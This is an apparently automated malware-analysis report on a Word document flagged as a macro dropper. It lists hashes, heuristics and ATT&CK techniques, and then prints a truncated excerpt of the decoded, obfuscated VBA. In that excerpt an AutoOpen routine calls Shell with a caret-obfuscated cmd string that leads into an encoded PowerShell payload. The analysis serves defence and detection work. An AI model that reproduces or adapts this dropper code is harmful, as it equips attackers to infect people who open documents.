Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 5698005a426b0824…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 86.0 KB
Created: 2018-06-06 07:31:00
Authoring application: Microsoft Office Word
First seen: 2018-06-21
MD5: a886bf5b8de5413c97244949d83da34c
SHA-1: bb47b6d8ea2c9f14cf416e7645e42e67153dd5fc
SHA-256: 5698005a426b08240a90774661298b7e387aec0d2536f53a2dbe7ccea9af7f97
Risk score: 242

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1203 Exploitation for Client Execution

The sample contains a VBA macro whose AutoOpen subroutine calls the Shell function, so the macro runs as soon as the document is opened and can execute arbitrary operating-system commands. The ClamAV detection name 'Doc.Dropper.Agent-6574760-0' suggests it acts as a dropper for other malware. The VBA code is obfuscated (junk arithmetic and string concatenation around the real logic), but the presence of the Shell() call is a strong indicator of malicious intent to download and execute a secondary payload.

Heuristics (7)

  • ClamAV: Doc.Dropper.Agent-6574783-0 (severity: critical, id: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Agent-6574783-0
  • VBA macros detected (severity: medium, 3 related findings, id: OLE_VBA_MACROS)
    Document contains VBA macro code
  • Shell() call in VBA (severity: critical, id: OLE_VBA_SHELL)
    Shell() call in VBA
  • AutoOpen macro (severity: high, id: OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens (severity: high, id: OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker (severity: medium, id: OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of the old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (severity: info, id: EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 11214 bytes
SHA-256: 651f622a4d7eba5d4017d4b674a0229d0d28a1efc4699eecc00c25b8ac8c3210

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "CswGkYsKwrLu"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function lpRBt()
On Error Resume Next
StDRTI = Hex(imucun + Hex(ZjMbZJ) * 6048 + Round(OrtJLa))
KiKXuv = Cos(MMQMDz)
fXujY = CDate(NiwvJ)
SiMYJw = Cos(zbQRW)
jiTAKN = Hex(DkjUw + Hex(nTQbhO) * 27631 + Round(cMAoH))
CAnPF = Cos(noYui)
hDjivs = CDate(fJhiz)
DHkGVS = Cos(DwCCz)
lpRBt = jHcXvUYJT + Shell(LkGvlPjKRD + Chr(FrbcFvJcT + vbKeyC + BzSPs) + kRFcWjREja + USLATvI + RFfJWLEYVXU + hwPlNiwOCl + idtorAIKbu + lNMkvt, 36552 - 36552)
Oaqwu = Hex(tvhKZ + Hex(QIObGV) * 34322 + Round(hCQCiD))
VijBjk = Cos(dzpKmM)
nVzKL = CDate(Kwcrh)
JmMJnP = Cos(uXMzJt)
End Function
Sub Autoopen()
On Error Resume Next
ofOlw = Hex(FitjTr + Hex(wRXGr) * 38461 + Round(bqQqCu))
RiaYoR = Cos(Pijqv)
fbsfqv = CDate(sdAGFp)
iwOYjB = Cos(nASIfa)
lpRBt
imnQv = Hex(QAzlA + Hex(CCohU) * 35153 + Round(UTRQLG))
KsaZXL = Cos(VJqMq)
ThhBd = CDate(dzlwS)
pjFDRV = Cos(JBLYZX)
End Sub


Attribute VB_Name = "oljswViIf"
Function kRFcWjREja()
On Error Resume Next
BEEGwI = Hex(XBUkw + Hex(InJFS) * 56861 + Round(taicL))
TuJqnj = Cos(LIrji)
aDiim = CDate(ozZwP)
lBlra = Cos(cuAoIN)
RiVhCYoJ = "md LmRYs" + "pB oqnpH" + "wQNicAhGYOPqCS" + "Dlq ztvmkR" + "qbndNj &   " + "  %^c^o"
jEtzz = Hex(caNDNO + Hex(rGWwtw) * 88019 + Round(BfRTi))
EjEmu = Cos(TFRvA)
AnwXwX = CDate(iiVXDu)
TuiZb = Cos(RiXrJR)
QiFaPqPYD = "^m^S^p^E^c^% " + "  " + "  " + "%^c^o^m^S^p^E^" + "c^%     " + "/V " + "      " + "  /c     " + "      set %GMZ"
zdmob = Hex(TzGSdj + Hex(rDiiLA) * 84224 + Round(zYasUU))
VPHOj = Cos(iBwjw)
aNNcA = CDate(hoNwpf)
ZjAEL = Cos(HbLcrK)
LPhRwz = "wfkkVT" + "iXENDJ%" + "=m" + "jZD" + "ABp&&s" + "et %YYwKfvi"
ApMCm = Hex(PsRWj + Hex(ZzmjuZ) * 50408 + Round(EHViwk))
pfPkWR = Cos(ssbLKn)
QIMQI = CDate(wUvQCQ)
KsTiFB = Cos(aNBlN)
RBziOVF = "tGhzo%=p&&set" + " %" + "nNpAolWfwkjR" + "%=o^w&&se" + "t %NCidR"
oHuEjP = Hex(MozIOo + Hex(oUjwhF) * 68263 + Round(zYtFIV))
DGbCiz = Cos(arhndW)
tKURC = CDate(FdCDIu)
HVLdG = Cos(WkshL)
cFwFCMdT = "lZoE" + "spHC" + "RD%=SA" + "USUWqZjHoo&&s" + "et %zr" + "crbJbiADFkv" + "F%=!%YYwKfvi" + "tGhzo%!&&set" + " %D" + "DKiFWLwBHSkuqS"
CzusR = Hex(bNDGOZ + Hex(GsjZDX) * 88220 + Round(jjEjDh))
zlAdI = Cos(zdLll)
hhJBH = CDate(pzYnLp)
RZSSq = Cos(OMOOS)
VEuYKSVHqJb = "%=XvGk" + "jzHC&&s" + "et %SwVIAwzjbsT" + "cj%=e^r&&set" + " %wnClNrJ" + "kXsUl" + "Z%=!%nNpAolWfwk" + "jR%!&&se"
kQjGP = Hex(nSNMC + Hex(fwuOh) * 77762 + Round(aKSqh))
KVZWwS = Cos(rvWVI)
IPXXwF = CDate(tntRz)
aCrvSa = Cos(ZFCOvQ)
dFsAUKaCsuF = "t %ZTljkDuVFt" + "QY%=s&&" + "set %fiVrLE" + "wJwl" + "kAiGC%=" + "GHlKikYiDiB&&se" + "t %WCboOsocl" + "Xwhz%=he&&" + "se"
jhjaYG = Hex(fvCnVl + Hex(nWcHX) * 33506 + Round(QzAEvI))
DNJbj = Cos(nLETt)
quGpHw = CDate(pmiaGY)
AShjVd = Cos(VcitMp)
EUjdhXwwE = "t %DLUWXE" + "DwMLAzO" + "%=ll&&!%zrc" + "rbJbiAD" + "FkvF" + "%!"
WbSJO = Hex(awKKtI + Hex(ThUmC) * 6763 + Round(KUdVzP))
VRXvuG = Cos(SKQRs)
YCIXpN = CDate(doIwr)
JOBwz = Cos(zjFjm)
jqLRA = "!%wn" + "ClNrJ" + "kXsUlZ%!!%" + "SwVIAwzjbsTc" + "j%!!"
wBqBX = Hex(VJJII + Hex(GfkrR) * 63365 + Round(bDmzA))
MTFtK = Cos(VWHrL)
cREaiw = CDate(FprRb)
RYXKL = Cos(EqjKk)
YGkSP = "%ZTljkDuV" + "FtQY%!!%WCbo" + "OsoclXw" + "hz%!!%DLUW" + "XEDwMLAz" + "O%!  -e KAAgAG4"
kRFcWjREja = RiVhCYoJ + QiFaPqPYD + LPhRwz + RBziOVF + cFwFCMdT + VEuYKSVHqJb + dFsAUKaCsuF + EUjdhXwwE + jqLRA + YGkSP
End Function
Function USLATvI()
On Error Resume Next
Qzonp = Hex(oYKpPE + Hex(Vnwub) * 39784 + Round(dltuz))
vfGqs = Cos(UJRzM)
AsdCz = CDate(ISJqZI)
HqimiG = Cos(pdDJST)
zGoCjBiw = "AR" + "QBXAC0ATwBiAEoA" + "RQ" + "BjAHQAI"
JkrDnj = Hex(bcYaoQ + Hex(fCFFzv) * 70987 + Round(mWntS))
WpUkdj = Cos(iSmlYS)
NJMqpH = CDate(bzDUX)
tzUQu = Cos(zEnDp)
ratnfCGwj = "AAgAFMAWQBzAH" + "QARQBtA" + "C4ASQBPAC4AUw" + "BUAFIARQBh" + "AE0AUgBFAGEAZA" + "BFAF"
kmw
... (truncated)